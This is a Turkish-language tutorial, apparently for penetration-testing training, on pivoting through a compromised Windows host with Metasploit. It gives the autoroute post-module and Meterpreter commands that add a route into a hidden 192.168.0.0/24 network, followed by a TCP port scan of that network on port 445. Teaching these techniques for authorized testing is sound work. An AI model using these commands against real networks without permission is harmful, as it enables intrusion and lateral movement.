Bu yazıda saldırgana ait olan Kali bilgisayarın tek bir IP adresi olup bu adres 10.0.0.50’dir. Meterpreter ile erişim elde edilen Windows bilgisayarın ise, 2 ayrı ağa ait olan iki IP değeri vardır. Birincisi, saldırganın istismar ederken erişebildiği 10.0.0.25 IP adresidir. İkincisi ise, saldırgan tarafından direk olarak erişim sağlanamayan 192.168.0.80 IP adresidir.
ifconfig
Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için MSF autoroute post modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.
background
route print
search autoroute
use post/windows/manage/autoroute
show options
Modüle oturum ID değeri ve erişim sağlanacak ağın bilgisi verilerek modül çalışıtırılır ve yönlendirme tablosuna yeni bir girdi eklenmiş olur.
set SESSION 1
set SUBNET 192.168.0.0/24
show options
run
route print
Not: MSF autoroute post modülü ile benzer işlevde olan Meterpreter autoroute betiği de bulunmaktadır. Ancak Meterpreter betiği yerine MSF post modülünün kullanılması tavsiye edilmektedir.
sessions -i 1
run autoroute -h
run autoroute -p
Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Bu durumda gerçekleştirilecek olan MSF tcp auxiliary modülü ile port taraması, Meterpreter üzerinden geçecektir. Port taraması için modül seçilir, modüle tarama parametreleri verilir ve modül seçenekleri incelenir.
background
use auxiliary/scanner/portscan/tcp
set PORTS 445
set RHOSTS 192.168.0.0/24
set THREADS 50
show options
Böylece, Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.
run